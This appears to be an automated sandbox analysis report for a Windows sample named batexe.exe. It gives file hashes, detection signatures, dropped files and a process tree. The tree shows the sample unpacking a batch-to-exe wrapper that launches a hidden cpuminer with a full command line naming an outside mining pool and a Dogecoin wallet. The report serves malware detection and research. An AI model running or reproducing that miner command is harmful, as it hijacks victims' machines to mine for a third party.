73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
297s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
24/02/2024, 06:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2356	b2e.exe
4004	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4816-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4816 wrote to memory of 2356	4816	batexe.exe	75
PID 4816 wrote to memory of 2356	4816	batexe.exe	75
PID 4816 wrote to memory of 2356	4816	batexe.exe	75
PID 2356 wrote to memory of 4132	2356	b2e.exe	76
PID 2356 wrote to memory of 4132	2356	b2e.exe	76
PID 2356 wrote to memory of 4132	2356	b2e.exe	76
PID 4132 wrote to memory of 4004	4132	cmd.exe	79
PID 4132 wrote to memory of 4004	4132	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4816
- C:\Users\Admin\AppData\Local\Temp\1817.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1817.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1817.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1D66.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4132
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1817.tmp\b2e.exe

Filesize
1.4MB

MD5
a37d5238d27fb8bcc446950bd129f917

SHA1
0e0551e10a6ff82f1bded19a7bd688a708a09389

SHA256
deae72163835581de7d89ccba82443825d68a9769ed49529a5de64307a49657a

SHA512
2a12cf1efc5c2cc69345fdd7609eb50e8384fe12b5d5c9373103bd4e379a84a7ead12214625eada2076f6ada60e6dab8930a6a7c4b1e3db36d15beaf7bc228ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\1817.tmp\b2e.exe

Filesize
1.8MB

MD5
3e8ffa9b718b872a0e265cced0508d29

SHA1
012e281c98b403aa8fe77161d793c1be350b8f02

SHA256
0d2eb41ed7f105b74c75d13f11a482c5578ad35d4c100cb509a6a1d4ec9a3b07

SHA512
4dd662137c52e6166a6d4dbc8e716708ee434b7a8d4b4771748a0e3c70e2ebe9ce06a181dc1521b328c9f492d2f21a1c50f4adfec7b9fe9a9c8dab9e61df8fb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1D66.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
631KB

MD5
ddf0209a7d52cdf6be86c2bd6702fddb

SHA1
783b8b14b9df57c168c9c5f28cbb60d7bde31c86

SHA256
f7d20ae6d8b42832b801e648b0cc51248e876039ea22ec1033795cc662aa6708

SHA512
0bdc9299a19442ae312c0862a2f60838326c4b7b799b17fa8070537704c1269b7399a4053c57a6085e1a194aabc7b9edc04d5a1f1dbad6075a39afef1f403c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
599KB

MD5
868b40d052b865b0af2d8e55198c4e90

SHA1
ffcdc6350be8641376e58180f3cbcb1981efe8ce

SHA256
0602534c7da9310128a6dc4e8608bf8ad68ef8f512951a0b01c70546b2ff4119

SHA512
516041383164942a2c1b9b5adb13201dc4fc49c643d246ab4477d45f48eabe901bd8dc4e49d406e213e9c6cc3598beff9249a87d15f50669b96cf02c667986ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
563KB

MD5
7af7cc535c28811bceb6c90dbe70db6d

SHA1
35711331efc3b380a3029136283fa6012e70b306

SHA256
1758783e5e129e126f47092e8877e16be378bb815d8eeb199b3c042ba1df182e

SHA512
95b042c60458652a5b5f18db5b255e8cb49f7998cf6e0523b78a0920aa25a56589678f2bd5293ecba08b890c0c1437972d194766a5374c1252ad6e1eed7d81d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
656KB

MD5
ac17a73727262100d7ca496b6faef50b

SHA1
fe5f56af2259ce73506706c5e5b52593891d55da

SHA256
09ee1f6d42afd9a036724eb3a23d306bfe620a168e862c19969560311f9d6193

SHA512
8f4d1cdee8da698d14a155516939d7cff26d7c44949ef61315b14cd7fa499f13d5bd99c68be00f689fb3f21c47840d8fd03f9d3f2f514b403c7276e031188f5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
453KB

MD5
d131941c9019acf83a33e931cc64b299

SHA1
98f7e51b53724e2e36fa880488abc00feb465d16

SHA256
e87716c15b9286ef866599062dad6af323e90cbb040a75f28540c3f148f53f97

SHA512
ffa1bb0290f15e97b65d29200ed5c23939cba83f72d91e91d4938776ee7e624a5b0015aa04bc7d6d304130e2fbb8eacc0ceb841dfb4c828322930c05f32271fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
512KB

MD5
acd0662e5e0c61e170c8770d7f497f1c

SHA1
733c536020db3ea573dab0252738f508253dfd54

SHA256
3b28da158a4ea12fde51d2294821930fa1363b78df664de10bb6f9580c5217d2

SHA512
55eb18f06c1a38d57bfb9d04e7784003efd77bcafc966e01eb7fa9537ee8757a94bf25291089f8f52c42a0196fa3d04f6583508166acdeee3c0c4fd066fffc43

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
799KB

MD5
fce8f14fe01309597417591190b474b7

SHA1
9baa34bbf7cd608c9d2d6f9eb868ff38e6d326ec

SHA256
cb06d2f07aa9684583708dfb9016262aa7bfa6dcb5c1514b5edccf0837bf6e3a

SHA512
32aea6e5b1f200890958f3fcde6454e2d411a8da77e31db6b274a02dd8fd98a559d6968b938612dfbcd45fc645a050408d1009dfb1dff501ab7d125813fd6ac6

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
407KB

MD5
4ce5053d490cbe463818fd00de3e9b8d

SHA1
4541e1caa90ee8ee6e18582b20cb985529e89d35

SHA256
d11dd51f19cb13ffc674e71bec635e81b758f75941aad63502511ad20fb36e62

SHA512
61f9dab9a00a8592b3b797dd0e733dd7218f97f7bcd43feff7f8a06bd3f8761d1fbf5903954033c772d5a13b0fa5d88fef8eb4aead4aa48a09c8f7886df2020a

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
365KB

MD5
a29e5b5efd36a6537568652827b8b4f4

SHA1
6c0ef14df9effca6ca825380fad9a5f1fcac9312

SHA256
4fab6195e05833c4d270e7e9c5a5c5c4589ed1f5891302c49eb8843a9c92454d

SHA512
e33c6d20f8a07775a3a09a044a08be2b29559a94e8421f1984ba64f708bff5151f4db4966bd73eb0f64f1151f929f4ba7c7ac4b1454d6defbca7ac6128f2a70f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
415KB

MD5
a64d88e9724aaeeffee018ef4c4e23b0

SHA1
adbfe9ca7050462ef067202d335b42d00aaaf5a5

SHA256
888b17d485ba7a6c0cf14be97038d9dcbaf5d5c4a12e677e32387a90a845d4fd

SHA512
9a623691ea74508dc9aacc6f314c9e30893d7bccea9de7e358bb211e7d28ff18e04aafad1fb31c75f3120565f2178f0cf6d09fa62a9e67bc4b96fb3a8dca46b9

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
506KB

MD5
4ed0868e06f7f0352356e6f21c85a51f

SHA1
d6761a97221f0eedca39a2f6c8486c6865eb1bcc

SHA256
9399d4f856cd89e4d54e0880e388e728f0a284acd5525f7265b253791d793c40

SHA512
a2d08eab5902b599bcdc9debd55e6b1c6bacc8d6cb1267772270a69e3371b9137337aad38a9f34497bb06c361e35c47623a4ce9b08c0e181dc3119120f9411b8

Download Submit
memory/2356-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2356-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4004-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4004-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4004-43-0x0000000061DB0000-0x0000000061E48000-memory.dmp

Filesize
608KB

Download
memory/4004-44-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/4004-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4816-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download